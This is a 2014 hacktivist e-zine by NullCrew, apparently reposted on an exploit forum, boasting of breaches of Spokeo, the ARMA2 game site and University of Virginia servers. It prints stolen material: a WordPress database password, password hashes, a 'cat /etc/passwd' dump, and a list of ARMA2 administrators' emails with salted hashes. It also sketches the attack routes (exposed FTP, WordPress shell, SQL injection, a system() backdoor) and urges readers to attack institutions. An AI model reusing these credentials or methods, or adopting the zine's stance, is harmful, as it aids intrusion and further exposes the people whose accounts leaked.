Exploit [eZine] FuckTheSystem (FTS) Zine 5

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32984
Проверка EDB
  1. Пройдено
Автор
NULLCREW
Тип уязвимости
PAPERS
Платформа
EZINE
CVE
N/A
Дата публикации
2014-04-22
Код:
███████████████████████████████████████████████████████████████████████████████████████████████████████
█                 Fuck feds, fuck police, fuck the government and most of all...                      █
█                                                                                                     █
█                `                ``````.` .`..``` ``                                                 █
█ ███                        ```.`.`...-``.--.--:-/:/--:--:`                           ██  █  2012 (X)█ 
█ █                       `.---:----.`.``.`.``...`---::-----/+::`                      █ █ █  2013 (X)█
█ ███                   `:...---/---.``````` ` `` ` `....-.-..-..---:.                 █  ██  2014 (X)█
█ █                 .-//--...`.-.`.``` ```        ````````  ``..`--.--`                               █
█              .-`.----..`.`.``  ` `                ` ``    ```-:--....                █   █ Issue #5 █
█ █ █           `//::-`..:-..`  `     ``                   ``     `.`..-.`:`           █   █          █
█ █ █          /o///:...:-.``      ` `                      ```     ``..```--          █████       4  █
█ ███         ds+/--:--.... `     ``             `           ```     `...-`.-                      2  █
█            omy+:--::/:``````                        `               ``.-:-..:        █           0  █
█ ███       Ndy+:--`.-..``                                              .---`-.        █              █
█ █         .dsh+-::--/--.`                                                ....`.`     █           e  █
█ ███       omhs-:-:-:-..`                                   `             ``.`-``     █████       d  █
█        `mdmo/s+-/:::.                                                  `.-`.:``                  i  █
█ █ █    .MNN+oho+o/++.``                                                 `...:::       █          t  █
█ ██     -Ndmssyo://+/...            `   `                                ```.--o       █          o  █
█ █ █    -MMhy:/:--+://-.`          `  `  `````                           `.`.-/d`      █          n  █
█ █  █  MNNmys:-:/:++--` `             ``````                      ` `````..-/d`        █████         █
█       .NMMNsy:-.///s:/-.```            `  ``                       ``.- .-:-+h`                     █
█       `NMMMds+-/.--:---.``  `          ` `..                    `  `````::-:+h`      █████          █
█ █████   oMMMMMms+//+oo-::.``...```` `````..--.`             ` ```.````..:o/+sos      █              █
█   █    `dMMMMMdyo:-/+::---..-`-.``...``..::...``````     ```` ..-```..:/hyssy/       █              █
█   █     -NMMMMMMmddso+//o+-:--.-...`.:-.-:---..-`.``  ` .````  ...`--+shmNmdd        █              █
█   █      -NMMMMMMNNMNddhhmdyo+:/::-..-.-----:-:-..---........`.-..:++ymMNNmM:        █████          █   
█ █   █    mmNmddhhhdhyhmdNNNmdyhy:..--/:-.-:s+-::--/::++yso+/ooshhmNNMNmNMs                          █ 
█ █████      +hNMMMMMMMMNNmmdmdhhdNmdso//:o:::+oyyyosdmddddddhhdmNmmNMNNNdmm+           ████          █
█ █   █       ooNMMMMMMMMMMMNMMMMNhsNmhy+/+++ohshNNNdyhyydNMMMMMMMMMMMMMMMm:            █  █          █
█            +yNMMMMMMMMMNo/yMMMMMdhhso+o/+++ydMhydMMMMMNhhMMMMMMMMMMMNm.               ███           █
█ █████        /shoMMMMMMMMNMN+mMMMMMNy/://:-:-/dodMNMMMd:+yNMMMMMMMMMN+s`              █  █          █
█ █            -yhdshMMMMMMMMMMMmMMMMNs/--.:.`-.+hNMMMNNhdMMMMMMMMMMNs/s`               █   █         █          
█ █████         os/hhoymMMMMMMMMNNMMMN:..--.-.``-mMMMMMMMMMMMMMMMMhoos/+                              █
█ █             `h+-:+sosshdNMMMNMMMd/..---..-.` /dMMMMMMMMMMMNhoosy:-+.                 █████        █
█ █████          .do-.``+++//:////:.``-.--.``..-..`/shddmdhyyoosso```+-                  █            █
█                .sh/.`     ``..``...----...--:.---..::+/+//--````-+-                    █            █
█                   +ms/-``   ``.---.-...---`.-::.-.-.`````  ` .-+s/`                    █████        █
█  ████               oyh+:.` ` `......-:-:...-:o/.`.`````.`-:osdy.                      █            █
█ █    █               /ys/:.` `````.`--os-`:o+.-. ` `..-/+sddh:`                        █            █
█ █                       `os+..```` `..`-...`````````.--/oyhdo-`                        █████        █
█  ████                     -yo:-..```..```.``   ....-:+oddmy-                                        █
█      █                    y/.-.```.-::-:-:.-/+::/shydy/     `   `                      █     █      █
█ █    █                     `/o:..```..`` .`.`.::-+hdh-    `..`.`.                      █     █      █
█  ████      `                 y/.` ```` ` ```.-/dNy          ...                        █     █      █
█                               oMMNh+:.` `` `.:ohmmmd`                                  █  █  █      █
█ █  █                       .  ymNNMNmmdhhdhmNNmmmmyo-                                  █ █ █ █      █
█  █ █                        `    ..:::::/:/+:/:-``.`                                    █   █       █
█   ██                                   ``                                                           █
█    █                                                                                                █
█    █                                                                                                █
█                                                                                                     █
█  ████                                                                                               █
█ █    █                                                                                              █
█ █                                                                                                   █
█  ████        											      █
█      █                                                                                              █
█ █    █                                                                                              █
█  ████                                                                                               █
█                                                                                                     █
█  █████                                                                                              █
█    █                     NullCrew. (Zer0Pwn, rootcrysis, Siph0n.):                                  █
█    █                 This is a 4/20 zine, how ya gonna read it with no weed?                        █
█    █                 FIRE UP!!                                                                      █
█                                                                                                     █
█  █████              Music for this zine!                                                            █
█  █                                                                                                  █
█  █████   Just tell them now they better hit the ground, all you hear is hostage down!               █
█  █       Whether Office, Dust, Aztec, or Lounge? All I hear is hostage down!                        █
█  █       So the terrorists getting the message now? All I hear is, hostage down!                    █
█  █████                                                                                              █
█                                                                                                     █
█  █   █                                                                                              █
█ █ █ █ █                                                                                             █
█ █  █  █                                                                                             █
█ █     █                                                                                             █
█                                                                                                     █
███████████████████████████████████████████████████████████████████████████████████████████████████████
        █                                                                           █
        █                       TABLE OF CONTENT                                    █
        █                                                                           █
	█████████████████████████████████████████████████████████████████████████████
                  █                                                       █
                  █   sPOKEO:                                             █
                  █   ARMA2:                                              █
                  █   VIRGINIA.EDU:                                       █                                                                     
                  █   Klas Telecom:                                       █
                  █   in.gov (Zimbra.):                                   █
                  █   Telco Systems:                                      █
                  █   National Credit union:                              █
                  █   Science and Technology center (stcu.int)            █
                  █   International Civil Aviation Organization(icao.int) █
                  █████████████████████████████████████████████████████████




█████   █████  █████  ███   ████   ███████     █    █   ██████ ███████  ███████   ████   █████  █
  █     █   █    █    █  █ █    █  █    ███    █    █  █          █        █     █    █  █   █
  █     █   █    █    █    █    █  █      ██   █    █  █          █        █     █    █  █   █
  █     █   █    █    █    █    █  █        █  █    █  █          █        █     █    █  █   █
  █     █   █    █    █    █    █  █       █   █    █  █          █        █     █    █  █   █
█████   █   █    █    █     ████   ████████     ████    ██████    █     ███████   ████   █   █  █



  Once upon a time, in 2012; A group of electronic brotherhood was born within the shadows of the legendery deep-web.
 This group excelled throughout time gaining noterity, eventually gaining a strong stature in the hacker-community.. Well.
 Imagine this, a year in and this group goes silent.. they lurk in the shadows. 
  

  Oh no! The group, they must have gotten v&! What-ever shall we do!? The many people wonder.
 Whelp, folks, we're here with some good information for you! #FuckTheSystem continues on!
 We would like to point out a few things about this e-zine ahead of time, before you go on the view the contents.

  This zine is titled #FuckTheSystem for a reason, and that reason is because the system is corrupt.
 So, for #FuckTheSystem we've decided to own and destroy several things belonging to something in the system.
 We're not your average super-heros of the internet; but we do dispense lulz at a heavy ammount when needed.

  #FuckTheSystem is generally aimed at the government, or anything that is corrupt; and that is the reason for these attacks.
 Ranging from government contractors, to universities, to telecommunications compaines, to information databases, and other things.
 They are all part of the system; and have failed examinations the first time arround; some of the attack methods may have been simple.. or the data not to complex.
 But, it can still lead to things that they do not want; and it also costs them, therefore we have commited actual damage to this certain aspect of the system. In a way, we achieve our goal.


  Anyone can #FuckTheSystem, not just us; You don't have to be an hacktivist, you just need to be an activist.
 You must have a voice that you want to be heard, and you can make that voice heard; We do it in this way, and it is effective.
 Anything works: Pictures, videos, graffiti, removal of survices, and of course.. hacking. There are many other things, you can figure it out.
 
  Ah, bahumbug, I think we've went on a bit to long about this; let's get on to the zine! - NullCrew
 P.S: There will be a download link at the end of the e-zine, just so you can download all of the data we took and mentioned, have fun.

                      rootcrysis  Zer0Pwn    Siph0n
                          ^          ^         ^
           .-"""-.       \_/        \_/       \_/  
          /       \      / \        / \       ) (   WE'VE LANDED MOTHERFUCKERS!
       .--'._____.'--.   \"/        \"/       \"/
      ( o     _     o )  /|\__,   __/|\       /|\
       '-..o_|_|_o..-'   \|      `   | \     / | \
        /        \      ` |\         |\ `   ` /|  `
       ()          ()     | \        / |   __/ |
                          | /       /  |  `    |
                          ` `      `   `       `


 ██   █                          █████ 
█ █      ███  █████  ████  █  █  █      █████
  █     █   █ █   █ █    █ █ █   █     █     █
  █     █     █   █ █    █ ██    █████ █     █
█████ █  ███  █████ █    █ █ █   █     █     █
            █ █     █    █ █  █  █     █     █
        ████  █      ████  █   █ █████  █████

     Alright, let's begin this story of rampage against Spokeo's administrators and web-developers.
   Now, I know you all are going to find this method laughable; However.. Spokeo had:
                                    
   1) A web-developer with FTP open on their private server.
   2) The web-developers server maintained a constantly updated copy of spokeo.com/blog's wp-config.php file
                     
    So, this was literally pretty fucking easy for us; Spokeo's web-developers private server maintained that, with FTP open..
   Whelp, knowing this? We decided to plug ourselves into that FTP, grab a copy of wp-config.php (For the private server.)
   And then practically just log into wordpress as administrator, shell; and had some fun collecting what we could before spokeo caught on.

   So, spokeo, what is it that we have learned today? Your administrators are more unsecure then your wifes vag to us..


	*Spokeo.com

            Uname:
            User:
            Php:
            Hdd:
            Cwd:	Linux ip-10-249-65-47 3.4.73-64.112.amzn1.x86_64 #1 SMP Tue Dec 10 01:50:05 UTC 2013 x86_64 [exploit-db.com]
                        48 ( apache ) Group: 48 ( ? )
                        5.3.28 Safe mode: OFF [ phpinfo ] Datetime: 2014-01-21 09:22:18
                        7.87 GB Free: 1.46 GB (18%)
                        /var/www/ drwxr-xr-x [ home ]

                        Name	Size	Modify	Owner/Group	Permissions	Actions
	                [ . ]	dir	2014-01-16 23:56:56	0/0	drwxr-xr-x	R T
	                [ .. ]	dir	2014-01-17 22:20:04	0/0	drwxr-xr-x	R T
	                [ blog-old ]	dir	2014-01-16 03:07:42	48/48	drwxr-xr-x	R T
	                [ cgi-bin ]	dir	2013-12-10 00:29:49	0/0	drwxr-xr-x	R T
	                [ error ]	dir	2014-01-07 17:43:04	0/0	drwxr-xr-x	R T
	                [ fixed ]	dir	2014-01-16 23:43:54	0/0	drwxr-xr-x	R T
	                [ html ]	dir	2014-01-16 03:21:31	0/0	drwxr-xr-x	R T
	                [ icons ]	dir	2014-01-07 17:43:10	0/0	drwxr-xr-x	R T
	                [ src ]	dir	2013-12-06 00:59:16	48/48	drwxr-xr-x	R T
	                .htaccess	141 B	2014-01-08 19:17:23	0/0	-rw-r--r--	R T E D
	                    blog	45 B	2014-01-16 23:57:47	0/0	-rw-r--r--	R T E D


    Okay, so, we checked the blog out; right? Like we said above. The administrator in this server kept a constantly updated version of wp-config.
   So, let's get to that:

                      (Blog)	
                      spokeo:$apr1$8HLyBy87$tDdtmCWPxlWbS0fugaiEQ1

                      WP-Config:
                      /** MySQL database username */
                      define('DB_USER', 'wordpress');

                     /** MySQL database password */
                     define('DB_PASSWORD', 'abra30hp');

                    /** MySQL hostname */
                    define('DB_HOST', 'localhost');


   Okay, so, no; we didn't get root; but, here you go:

                  : cat /etc/passwd
                  
                    root:x:0:0:root:/root:/bin/bash
                    bin:x:1:1:bin:/bin:/sbin/nologin
                    daemon:x:2:2:daemon:/sbin:/sbin/nologin
                    adm:x:3:4:adm:/var/adm:/sbin/nologin
                    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
                    sync:x:5:0:sync:/sbin:/bin/sync
                    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
                    halt:x:7:0:halt:/sbin:/sbin/halt
                    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
                    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
                    operator:x:11:0:operator:/root:/sbin/nologin
                    games:x:12:100:games:/usr/games:/sbin/nologin
                    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
                    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
                    nobody:x:99:99:Nobody:/:/sbin/nologin
                    ec2-user:x:222:500:EC2 Default User:/home/ec2-user:/bin/bash
                    saslauth:x:221:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
                    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
                    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
                    ntp:x:38:38::/etc/ntp:/sbin/nologin
                    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
                    tcpdump:x:72:72::/:/sbin/nologin
                    dbus:x:81:81:System message bus:/:/sbin/nologin
                    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
                    apache:x:48:48:Apache:/var/www:/sbin/nologin                             


      Don't think that's all, because it's not; In the download at the end of the zine is one of spokeos sql dbs, have fun!  .
         And also, as proof that we did indeed achieve this; at the time of the exploit, we defaced their blog's index.
                      
                        Mirror: http://zone-h.com/mirror/id/21609991

                                    ███
 ███  █  ███  █████  █   █   ███   █   █
█   █   █   █ █   █ █ █ █ █ █   █     █
   █    █████ ████  █  █  █ █████   ██ 
 ██     █   █ █   █ █     █ █   █  █        
█                                  ████ 
████  █    

   On to the next one, which is ARMA2; Now, what is ARMA?
  Arma is a video-game that military occupants use to gain knowledge.

   Arma sadly didn't have much interesting in it; Aside from a SQL Injection vulnerability that we exploited.
  What we were able to grab, instead; were administrator passwords belonging to ARMA2's website.
  Amongst a few other things, of course.

        ██████████████████████████████████████████████
	█S3RV3R INF0RMATI0N:			     █
	█web application technology:PHP 5.4.12, Nginx█
	█3XPL0IT ALLOWED BY: JOOMLA                  █	
	█DBMS:MySQL 5.0				     █
	██████████████████████████████████████████████

           email, username, usertype, password
 
           [email protected]:Morphicon:Editor:8882efcade928d9ee7c9a5663d102c4b:pMsFohI8s2Ybcf9ELDAQNX617oH1sgbE 
           [email protected]:JCarey:Editor:d98af715e64f5ad934885d0f3c7670d8:wReCiDAkQrGlVpymplRYGLAQU573Neme
           [email protected]:dmusil:Manager:32c3dacb5ccb11d17e78b0213f3bc9ec:eKzhfALEnYbYilxh1ooHeZeZ550is45R
           [email protected] dave:Author:f89764e4af4f12da89f22249b75a4c46:gAFUDZoAt33SjXQ9opHK8EzLywnwrY2g 
           [email protected]:Dwarden:Manager:e81d60b356e51801f4953becce7ff38f:bMsIEoaKrDARcN9GCtvS8sqvejg9FMY2
           [email protected]:hlavac:Super Administrator:9492ac0bfdb364155b011bdd131e2803:dUyNEubxcDLMh30ol8tsadMaOLdQjQLm 
           [email protected]:Ivan:Manager:1e45d443266ce93f9dea0cf55e891e2d:iT9ow9gjPCnenYPRrdGkcPRuyNwRK8v4 
           [email protected]:admin:Super Administrator:9fa68fda92746ea27e972e43e02436af:ChQ20HRqOmhKemU5aVnAUvuLY5i4vl2C
           [email protected]:jay:Administrator:b01de7f6edb9a46d9e15b2dbc0bb156b:TM5NyeccedXVrUJwQcDtnQXmugkZfVCk 
           [email protected]:jennik:Manager:4c2d0769198ea6a133100021a0558c11:i2xTbLPXc0qedLJ5htl33jdqRsPhuUCT
           [email protected]:Jervant:Super Administrator:036252be62b5fae2c244e989ed32f485:vC8RkTdOMA4U9YMKmbqJ5XpjDGR1qmrJ
           [email protected]:kunt:Super Administrator:4020b9d55d6066fee53daf2f567e3cef:wWmNJsCNz8zbGw6pwQEiQw67ZZuyHXA3
           [email protected]:lukas:Manager:f773700d68e492721659877a0f3939a0:isVwTHFMRumLP7p2y1SBeYwTnXnvpNDQ
           [email protected]:Harangozo:Manager:e5caaeaea2353d2c3995e069ad53a7b6:uSTumeJlyOE8gmwUdoQPN1S8cYN6Z6GB
           [email protected]:meddy:Editor:db607e2a877084c764c790d764bdf3dd:HHd3GUnE93KQAs0uQ1LDePU6QkXKLsPW
           [email protected]:Pettka:Administrator:df3aef513b8c1294e28cc39d8404a621:dqILH3a1pdI509xCrz6W9mI64FdgjY83
           [email protected]:placebo:Author:9f7062ccd0e20bd725e5e09d90f01c39:OQpUsc5G0XzcavaaMPNcRkk7RzM1iigN
           [email protected]:Maruk:Administrator:e722beab3a581d403138c5aa40094201:oLtJHdBw7xnSMo7Ab8cq8Nwkv9Mv0b9K
           [email protected]:ikkaku:Administrator:9b3c5af7720da3a7bf4880655e6a93cd:YDmqdNSR2eNKjQaoU78JL1bdM1mjMp9L
           [email protected]:vasa:Super Administrator:c301ce7a3d2fbf58acba2ebd69abf13b:baokGrB1Q1GdyQMRbL7JOMFpfVb84gol
           [email protected]:wocko:Manager:c2c72869c0974cd86aea9b5b60280ab3:OwOzsiNR0vMRVeO1Ome8mj4XLsTyepV4


                                          
         █  █ █     █  ███
 ███  █  █  █  █   █  █   █
█   █    █  █   █ █   █████
   █     ████    █    █   █
█   █ 
 ███  █

    UVA, Also known as the University Of Virginia; Or virginia.edu..
   Let's start with security standards taken since the last break-in:

          1) Disable word-press logins assuming that hackers have ONLY taken advantage of your out of date WP versions.
          2) What, no number two? Why is that, NullCrew?

    Funny that you ask, the University Of Virginia, we were able to spawn a system() backdoor and skim through your files.
   It's also noticably laughable that the UVA IT Crew decides that everything is secure enough to host a good few other sites, with shared hosting.
   Now, you can't have all the goodies.. BUT: We will give you enough to tide you over.

    Oh, and UVA? Secure your shit, or get owned over and over and over again; several of your subdomains are exploitable.
   Not to mention that where it's all shared, every website hosted by UVA?.. Whelp, root one, get them all.


          uname -a AIX ws9-1 3 5 000458FAD300
          
          ls /:
             X11.5 
             audit 
             bin 
             bosinst.data 
             common 
             contrib 
             core 
             dev 
             etc 
             frame 
             gnu 
             h1 
             h2 
             home 
             image.data 
             itc 
             lib 
             lost+found 
             lpp 
             lv1 
             lv1new 
             lv2 
             man 
             mnt 
             mount.a237722 
             mount.t237722 
             na 
             net 
             opt 
             proc 
             rs6000 
             sbin 
             smit.log 
             smit.script 
             smit.transaction 
             tftpboot 
             tmp 
             u 
             unix 
             usr 
             uva 
             var 
             vfs.t237722 
             web 
             web.pri 
             web.sec 
             www
            
          ls /web:
2012-13yir.artsandsciences.virginia.edu aaheritageva.org aahv.virginiafoundation.org accdb.bme.virginia.edu accs.virginia.edu acrossthefootbridge.com acrossthefootbridge.org adh.art.virginia.edu advance.virginia.edu aix-web-cluster-1.itc.virginia.edu albemarleemergency.com albemarleemergency.org alumnitravel.virginia.edu amalgam.virginia.edu americanpoliticaldevelopment.org americanpresident.org amp.sys.virginia.edu appreciativeinquiry.virginia.edu approject.org artsandsciences.virginia.edu artsboxoffice.virginia.edu ashaforeducation.orgs.virginia.edu backstory.vfhblogs.org backstory2013.vfhblogs.org backstoryradio.net backstoryradio.org behaviorprogress.org behaviorprogress.virginia.edu bioethics.virginia.edu biomath.virginia.edu blackunionsoldiers.org blog.bioinformatics.virginia.edu blog.cvrc.virginia.edu blog.encyclopediavirginia.org blog.innovation.virginia.edu bme.virginia.edu board.vfhblogs.org board.virginiafoundation.org bohr.ms.virginia.edu bookartspress.com bookartspress.net bookartspress.org bsuva-epubs.org bsuva.org buildingbetterteachers.org campaign.artsandsciences.virginia.edu campaign.virginia.edu ce.virginia.edu cee.virginia.edu centerforpolitics.org central.itc.virginia.edu cgep.virginia.edu charlottesvilleemergency.com charlottesvilleemergency.org climate.virginia.edu collegehealthsurveillancenetwork.org communityemergency.com communityemergency.org coopercenter.org cpe.virginia.edu creativewriting.virginia.edu cts.virginia.edu curry.edschool.virginia.edu curry.virginia.edu curryschool.net curryschool.org cvrc.virginia.edu cvwp.net cvwp.org darden.virginia.edu data.bioinformatics.virginia.edu dc.vfhblogs.org demographics.coopercenter.org dept.biology.virginia.edu dev.artsandsciences.virginia.edu dev.ce.virginia.edu dev.centerforpolitics.org dev.coopercenter.org dev.curry.virginia.edu dev.cvrc.virginia.edu dev.hereford.virginia.edu dev.mae.virginia.edu dev.math.virginia.edu dev.mlbs.virginia.edu dev.mobile.virginia.edu dev.rarebookschool.org digitalstoryteller.org discoveringcurry.com dnaseq.med.virginia.edu docscompass.virginiafoundation.org documentscompass.org dscourse.org ecomod.virginia.edu edui.vfhblogs.org edui2009.vfhblogs.org edui2011.vfhblogs.org edui2012.vfhblogs.org eduiconf.org ee2.hr.virginia.edu engl.virginia.edu essaysinhistory.com essaysinhistory.net essaysinhistory.org etc ev.vfhblogs.org expandingcollegeopps.org faculty.virginia.edu files-with-low-gid folklife.vfhblogs.org folklifefieldnotes.org folklifefieldnotes.vfhblogs.org frog.edschool.virginia.edu genesis2.virginia.edu genesisII.virginia.edu genesisii.virginia.edu globalhealth.cgh.virginia.edu goodpolitics.net goodpolitics.org graduate.engl.virginia.edu gwpapers.virginia.edu harvardprincetonuva.com hereford.virginia.edu hfb.vfhblogs.org history.virginia.edu homedir.virginia.edu hoosonline.virginia.edu hoovision.athletic.virginia.edu hr.virginia.edu iasc-culture.org iath.virginia.edu ien.arch.virginia.edu im.dev.virginia.edu indorgs.virginia.edu infotech.seas.virginia.edu iris.virginia.edu isweb jefferson.village.virginia.edu kcci.virginia.edu kinzie.edschool.virginia.edu kluge-ruhe.org krs.clas.virginia.edu lib.law.virginia.edu linux-web-cluster-2.itc.virginia.edu linux-web-cluster-3.itc.virginia.edu livedtheology.org louisiananativeguard.org ltap.cts.virginia.edu m.vabook.org macarthur.virginia.edu marriagematters.virginia.edu math.virginia.edu medicine.virginia.edu midatlantic-terascale.org millercenter.virginia.edu mlbs.org mlbs.virginia.edu mlp.virginia.edu mobile.virginia.edu modernpoetry.engl.virginia.edu morphogenesis.virginia.edu mrsec.virginia.edu msdnaa.virginia.edu mydcav.org mylabpartner.org myuva.virginia.edu nationalsocialnorm.com nationalsocialnorm.org nationalsocialnorminstitute.com nationalsocialnorminstitute.org nationalsocialnorms.com nationalsocialnorms.org nationalsocialnormsinstitute.com nationalsocialnormsinstitute.org new.artsandsciences.virginia.edu new.hereford.virginia.edu new.trc.virginia.edu news.virginia.edu nrcgtuva.org ntlcoalition.org ntls.info officearchitect.virginia.edu old.backstoryradio.org old.engl.virginia.edu old.readmeridian.org old.uvacse.virginia.edu oldbooks.virginia.edu online.seas.virginia.edu onlinelearn.edschool.virginia.edu opengrounds.virginia.edu openportfolio.org organizationalexcellence.virginia.edu outs parallaxproject.org pdk.edschool.virginia.edu pharm.virginia.edu pi.math.virginia.edu pibeta.phys.virginia.edu podcast.virginia.edu poetryforge.org policog.politics.virginia.edu primaryaccess.org proxy.virginia.edu pva.med.virginia.edu raisetherank.com rarebookschool.com rarebookschool.net rarebookschool.org rbsconnect.org readingfirst.virginia.edu readingquest.org readmeridian.org recsports.virginia.edu redirect-test.vfhblogs.org rff.vfhblogs.org rff.virginiafolklife.org riggoryridge.org rodmanscholars.org romereborn.virginia.edu rotunda.virginia.edu rotunda_cam salsaclub.orgs.virginia.edu sciencescholars.clas.virginia.edu seas.virginia.edu sexualassault.virginia.edu share silenegenomics.biology.virginia.edu sis.virginia.edu site.virginia.edu smarttravellab.virginia.edu social.virginia.edu socialnorm.org socialnorminstitute.com socialnorminstitute.org socialnorms.org socialnormsinstitute.com socialnormsinstitute.org sophiarosenfeld.com southernmediafund.org special.edschool.virginia.edu staging.aaheritageva.org staging.hr.virginia.edu staging.rotunda.virginia.edu staging.virginia.edu state.virginia.edu storyweb.org studiorecover.virginia.edu studyabroad.virginia.edu sysbio.virginia.edu teach.virginia.edu teacherlink.org teis.virginia.edu tempo.virginia.edu test test.artsandsciences.virginia.edu test.che.virginia.edu test.iath.virginia.edu test.millercenter.virginia.edu test.rarebookschool.org test.romereborn.virginia.edu test.vfhblogs.org testhost.virginia.edu titus-group.med.virginia.edu tlp.seas.virginia.edu today.news.virginia.edu trc.virginia.edu tti.virginia.edu uva.healthfoundation.virginia.edu uva2go.net uva2go.org uvacatering.com uvacse.virginia.edu uvaemergency.com uvaemergency.org uvafallschurch.com uvafamilies.virginia.edu uvarichmond.com uvaspeechandhearing.org uvatibetcenter.org uvatogo.net uvatogo.org vabc.vfhblogs.org vabook.org vaindianprogram.com vaindianprogram.net vaindianprogram.org vfh.vfhblogs.org vfhblogs.org vfhevents.vfhblogs.org vfhevents.virginia.edu vfhradio.org vfhumanities.org vhosts.itc.virginia.edu vignettes.vfhblogs.org virginiabookarts.org virginiabookarts.vfhblogs.org virginiafolklife.org virginiafoundation.org virginiahumanities.org virginiaindianprogram.com virginiaindianprogram.net virginiaindianprogram.org virginiavignettes.org viseyes.org viva.ee.virginia.edu w wais wc.engl.virginia.edu web-clusters-monitor webtest.itc.virginia.edu wgr.vfhblogs.org whitehousetapes.org withgoodreasonradio.org womenscenter.virginia.edu ws0-2.itc.virginia.edu ws1-2.itc.virginia.edu ws10.itc.virginia.edu ws11.itc.virginia.edu ws12.itc.virginia.edu ws13.itc.virginia.edu ws16.itc.virginia.edu ws17.itc.virginia.edu ws2-2.itc.virginia.edu ws3-2.itc.virginia.edu ws4-2.itc.virginia.edu ws5-2.itc.virginia.edu ws6-2.itc.virginia.edu ws7-2.itc.virginia.edu ws8-2.itc.virginia.edu ws9-2.itc.virginia.edu www.aaheritageva.org www.aahv.virginiafoundation.org www.advance.virginia.edu www.albemarleemergency.com www.albemarleemergency.org www.alumnitravel.virginia.edu www.amalgam.virginia.edu www.americanpoliticaldevelopment.org www.americanpresident.org www.appreciativeinquiry.virginia.edu www.approject.org www.artsandsciences.virginia.edu www.artsboxoffice.virginia.edu www.backstory.vfhblogs.org www.backstory2013.vfhblogs.org www.backstoryradio.net www.backstoryradio.org www.behaviorprogress.org www.bioethics.virginia.edu www.biomath.virginia.edu www.blackunionsoldiers.org www.bme.virginia.edu www.board.vfhblogs.org www.board.virginiafoundation.org www.bookartspress.com www.bookartspress.net www.bookartspress.org www.bsuva-epubs.org www.bsuva.org www.buildingbetterteachers.org www.campaign.artsandsciences.virginia.edu www.campaign.virginia.edu www.cci.virginia.edu www.ce.virginia.edu www.cee.virginia.edu www.centerforpolitics.org www.cgep.virginia.edu www.charlottesvilleemergency.com www.charlottesvilleemergency.org www.che.virginia.edu www.climate.virginia.edu www.collegehealthsurveillancenetwork.org www.communityemergency.com www.communityemergency.org www.coopercenter.org www.cpe.virginia.edu www.creativewriting.virginia.edu www.cts.virginia.edu www.curry.virginia.edu www.cvwp.net www.cvwp.org www.darden.virginia.edu www.dc.vfhblogs.org www.digitalstoryteller.org www.discoveringcurry.com www.documentscompass.org www.dscourse.org www.ecomod.virginia.edu www.edui.vfhblogs.org www.edui2009.vfhblogs.org www.edui2011.vfhblogs.org www.edui2012.vfhblogs.org www.eduiconf.org www.essaysinhistory.com www.essaysinhistory.net www.essaysinhistory.org www.ev.vfhblogs.org www.expandingcollegeopps.org www.faculty.virginia.edu www.folklife.vfhblogs.org www.folklifefieldnotes.org www.folklifefieldnotes.vfhblogs.org www.genesis2.virginia.edu www.genesisII.virginia.edu www.genesisii.virginia.edu www.goodpolitics.net www.goodpolitics.org www.gwpapers.virginia.edu www.harvardprincetonuva.com www.hereford.virginia.edu www.hfb.vfhblogs.org www.homedir.virginia.edu www.hoosonline.virginia.edu www.hr.virginia.edu www.iasc-culture.org www.iath.virginia.edu www.indorgs.virginia.edu www.jilluva.org www.kcci.virginia.edu www.kluge-ruhe.org www.livedtheology.org www.louisiananativeguard.org www.m.vabook.org www.macarthur.virginia.edu www.mae.virginia.edu www.marriagematters.virginia.edu www.math.virginia.edu www.medicine.virginia.edu www.midatlantic-terascale.org www.millercenter.virginia.edu www.mlbs.org www.mlbs.virginia.edu www.mlp.virginia.edu www.mobile.virginia.edu www.morphogenesis.virginia.edu www.mrsec.virginia.edu www.mydcav.org www.mylabpartner.org www.myuva.virginia.edu www.nationalsocialnorm.com www.nationalsocialnorm.org www.nationalsocialnorminstitute.com www.nationalsocialnorminstitute.org www.nationalsocialnorms.com www.nationalsocialnorms.org www.nationalsocialnormsinstitute.com www.nationalsocialnormsinstitute.org www.ntlcoalition.org www.ntls.info www.officearchitect.virginia.edu www.opengrounds.virginia.edu www.openportfolio.org www.organizationalexcellence.virginia.edu www.parallaxproject.org www.pharm.virginia.edu www.poetryforge.org www.primaryaccess.org www.publicaffairs.virginia.edu www.raisetherank.com www.rarebookschool.com www.rarebookschool.net www.rarebookschool.org www.rbsconnect.org www.readingfirst.virginia.edu www.readingquest.org www.readmeridian.org www.recsports.virginia.edu www.redirect-test.vfhblogs.org www.rff.vfhblogs.org www.riggoryridge.org www.rodmanscholars.org www.romereborn.virginia.edu www.rotunda.virginia.edu www.seas.virginia.edu www.sexualassault.virginia.edu www.sis.virginia.edu www.social.virginia.edu www.socialnorm.org www.socialnorminstitute.com www.socialnorminstitute.org www.socialnorms.org www.socialnormsinstitute.com www.socialnormsinstitute.org www.sophiarosenfeld.com www.southernmediafund.org www.staging.virginia.edu www.storyweb.org www.studiorecover.virginia.edu www.studyabroad.virginia.edu www.sysbio.virginia.edu www.teach.virginia.edu www.teacherlink.org www.tempo.virginia.edu www.test.vfhblogs.org www.trc.virginia.edu www.tti.virginia.edu www.upress.virginia.edu www.uva.edu www.uva2go.net www.uva2go.org www.uvacatering.com www.uvacse.virginia.edu www.uvaemergency.com www.uvaemergency.org www.uvafallschurch.com www.uvafamilies.virginia.edu www.uvarichmond.com www.uvaspeechandhearing.org www.uvatibetcenter.org www.uvatogo.net www.uvatogo.org www.vabc.vfhblogs.org www.vabook.org www.vaindianprogram.com www.vaindianprogram.net www.vaindianprogram.org www.vfh.vfhblogs.org www.vfhblogs.org www.vfhradio.org www.vfhumanities.org www.vignettes.vfhblogs.org www.virginia.edu www.virginiabookarts.org www.virginiabookarts.vfhblogs.org www.virginiafolklife.org www.virginiafoundation.org www.virginiahumanities.org www.virginiaindianprogram.com www.virginiaindianprogram.net www.virginiaindianprogram.org www.virginiavignettes.org www.viseyes.org www.wc.engl.virginia.edu www.wgr.vfhblogs.org www.whitehousetapes.org www.withgoodreasonradio.org www.womenscenter.virginia.edu 